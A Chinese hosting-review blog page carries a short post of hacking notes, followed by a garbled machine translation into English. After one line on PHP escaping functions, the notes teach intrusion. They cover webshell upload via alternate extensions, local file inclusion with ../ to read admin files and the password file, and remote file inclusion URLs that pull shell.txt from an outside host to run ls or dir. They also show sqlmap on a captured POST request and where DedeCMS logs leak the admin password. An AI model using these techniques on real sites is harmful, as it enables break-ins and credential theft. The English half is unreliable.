VPS参考测评推荐
专注分享VPS主机优惠信息
阿里云618年中促销

2016.5.19***经验总结

华为云
主机参考:服务器测评参考推荐网,专注分享服务器优惠信息!如果您想在本站投放您的广告,点此直达!如果您不想付费,您也可以免费投稿您的产品信息,点此直达联系我们
部分文章发布时间较久远,可能存在未知因素,购买时建议在本博客搜索商家名称,可查看相关文章充分了解商家!若非中文页面可使用谷歌浏览器同步翻译!跑路不诚信商家列表

PHP下防跨站用PHP自带的strip_tags()和htmlspecialchars()可以对用户提交的

html和PHP进行转换,对UPDATE和INSERT中的变量用以上两个函数转换

如果PHP假设在win上那么就可以解析cer,asa,aspx,asax,aspx,cdx格式的文件

而在Linux,Unix上则可以解析pl,PHP3,格式的文件(pl:perl语言)

PHP2,PHP,Inc,pwml,asa,cer利用上传webshell

如果PHP使用了文件包含的方法则用 www.xxx.com/index.php?page=./admin.php就可以读取当前路径下admin.php文件的内容了,也可以用../跳转到其他目录去查看其

它文件 Linux下如果路径对则可以读出密码文件若不对可以用../不断探测Linux主机下 www.xxx.com/index.php?page=http://www.hack.com/shell.txt?shell=ls

-a 可以遍历当前目录下的所有文件,win下提交www.xxx.com/index.php?

page=http://www.hack.com/shell.txt?shell=dir 同样遍历文件

sqlmap的post注入新学到的方法:在网站中找到表单提交的地方,填写信息提交,抓

包,抓到的包存在txt文件中,运行sqlmap,sqlmap.py -r 文件路径sqlmap,sqlmap.py -r 文件路径 –current-db 读取当前数据库

织梦cms 配置文件地址 data/admin/ 下,其中的ver.txt 存放的是系统的版本时间

系统文件时间,找到相应版本的日志文件地址。里面可以爆出管理员密码,找到后台

即可登录。


The strip_tags() and htmlspecialchars() provided by PHP can be used for cross site protection

HTML and PHP are transformed, and the variables in update and insert are transformed with the above two functions

If PHP is supposed to be on win, it can parse files in the format of CER, ASA, ASPX, asax, ASPX and CDX

On Linux and UNIX, files of PL, PHP3 and format can be parsed (pl: perl language)

Php2, PHP, Inc, pwml, ASA, CER use upload webshell

If PHP uses the method contained in the file, you can use www.xxx.com/index.php? Page =. / admin.php to read the content of the admin.php file in the current path, or you can use.. / to jump to other directories to view it

Under Linux, if the path is correct, you can read the password file. If not, you can use.. / to continuously probe the Linux host www.xxx.com/index.php? Page = http://www.hack.com/shell.txt? Shell = ls

-A can traverse all files in the current directory, and submit www.xxx.com/index.php under win?

Page = http://www.hack.com/shell.txt? Shell = dir also traverses files

SQL map post injection new learning method: find the place of form submission in the website, fill in information submission, grasp

Package. The caught package exists in the txt file. Run sqlmap, sqlmap.py-r file path sqlmap, sqlmap.py-r file path — current DB to read the current database

Under the address data / admin / of Zhimeng CMS configuration file, ver.txt stores the version time of the system

, system file time, find the log file address of the corresponding version. You can find the administrator’s password and find the backstage

To log in.

————————————————————–
主机参考,收集国内外VPSVPS测评主机测评云服务器虚拟主机独立服务器,国内外服务器高性价比建站主机相关优惠信息@zhujicankao.com
详细介绍和测评国外VPS主机,云服务器,国外服务器,国外主机的相关优惠信息,商家背景,网络带宽等等,也是目前国内最好的主机云服务器VPS参考测评资讯优惠信息分享平台

打赏
转载请注明原文链接:主机参考 » 2016.5.19***经验总结
主机参考仅做资料收集,不对商家任何信息及交易做信用担保,购买前请注意风险,有交易纠纷请自行解决!

评论 抢沙发